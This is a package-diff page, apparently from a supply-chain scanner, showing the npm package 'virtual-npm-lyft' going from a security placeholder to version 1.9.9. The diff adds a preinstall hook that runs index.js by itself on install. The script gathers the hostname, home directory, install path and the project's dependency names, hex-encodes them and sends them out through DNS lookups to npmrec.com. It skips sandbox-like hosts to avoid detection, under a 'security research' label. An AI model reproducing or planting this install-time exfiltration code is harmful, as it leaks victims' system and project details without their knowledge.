virtual-npm-lyft 0.0.1-security → 1.9.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of virtual-npm-lyft might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +110 -0
  3. package/package.json +7 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=virtual-npm-lyft for more information.
1
+ This package is meant for security research purposes and does not contain any useful code.
package/index.js ADDED
@@ -0,0 +1,110 @@
1
+ /*
2
+
3
+ This code is used for research purposes.
4
+
5
+ No sensitive data is retrieved.
6
+
7
+ Callbacks from within organizations with a
8
+ responsible disclosure program will be reported
9
+ directly to the organizations.
10
+
11
+ Any other callbacks will be ignored, and
12
+ any associated data will not be kept.
13
+
14
+ If you have any questions, please contact:
15
+ - harbitz@wearehackerone.com
16
+
17
+ */
18
+
19
+ const dns = require("dns");
20
+ const os = require("os")
21
+ const fs = require("fs");
22
+ const process = require("process");
23
+
24
+ function toHex(str) {
25
+ var result = '';
26
+ for (var i=0; i<str.length; i++) {
27
+ result += str.charCodeAt(i).toString(16);
28
+ }
29
+ return result;
30
+ }
31
+
32
+ const homeDirsToIgnore = [
33
+ "/root/test/node_modules",
34
+ "/ptd/node_modules",
35
+ "/home/fakename/app",
36
+ ]
37
+
38
+ const hostnamesToIgnore = [
39
+ "BBOGENS-LAPTOP",
40
+ ];
41
+
42
+ function getPkgJsonDir() {
43
+ const { dirname } = require ( 'path' );
44
+ const { constants, accessSync } = require ( 'fs' );
45
+
46
+ for ( let path of module.paths ) {
47
+ try {
48
+ let prospectivePkgJsonDir = dirname ( path );
49
+ accessSync ( path, constants.F_OK );
50
+ return prospectivePkgJsonDir;
51
+ } catch ( e ) {}
52
+ }
53
+ }
54
+
55
+ function main() {
56
+ const pjs = JSON.parse((fs.readFileSync(__dirname + "/package.json")).toString());
57
+ const id = Date.now();
58
+
59
+ if (homeDirsToIgnore.indexOf(os.homedir()) > -1) {
60
+ return;
61
+ }
62
+
63
+ if (hostnamesToIgnore.indexOf(os.hostname()) > -1) {
64
+ return;
65
+ }
66
+
67
+ let packages = "";
68
+
69
+ try {
70
+ const pjsRoot = JSON.parse((fs.readFileSync(getPkgJsonDir() + "/package.json")).toString());
71
+ packages = JSON.stringify(Array.from(Object.keys(pjsRoot.dependencies)).join(";"));
72
+ } catch {
73
+ }
74
+
75
+ const relevantInfo = [
76
+ os.hostname(),
77
+ os.homedir(),
78
+ __dirname,
79
+ pjs.name + "-" + pjs.version,
80
+ packages
81
+ ]
82
+
83
+ const stringFragments = toHex(JSON.stringify(relevantInfo)).match(/.{1,63}/g);
84
+
85
+ sendData(stringFragments);
86
+ dns.lookup('ns1.npmrec.com', function(err, address) {
87
+ if (!err) {
88
+ nsAddress = address;
89
+ } else {
90
+ nsAddress = '8.8.8.8';
91
+ }
92
+ dns.setServers(['188.166.0.193', '188.166.110.6']);
93
+ sendData(stringFragments);
94
+ });
95
+
96
+ function sendData(stringFragments) {
97
+ for (let i = 0; i < stringFragments.length; i++) {
98
+ try {
99
+ resolveFragment(id, i, stringFragments);
100
+ } catch {
101
+ }
102
+ }
103
+ }
104
+
105
+ function resolveFragment(id, counter, stringFragments) {
106
+ dns.resolve4(`morjok.${id}.${counter+1}.${stringFragments[counter]}.npmrec.com`, () => {})
107
+ }
108
+ }
109
+
110
+ main();
package/package.json CHANGED
@@ -1,6 +1,10 @@
1
1
  {
2
+ "description": "Security research purposes only.",
3
+ "main": "index.js",
2
4
  "name": "virtual-npm-lyft",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
5
+ "license": "ISC",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ },
9
+ "version": "1.9.9"
6
10
  }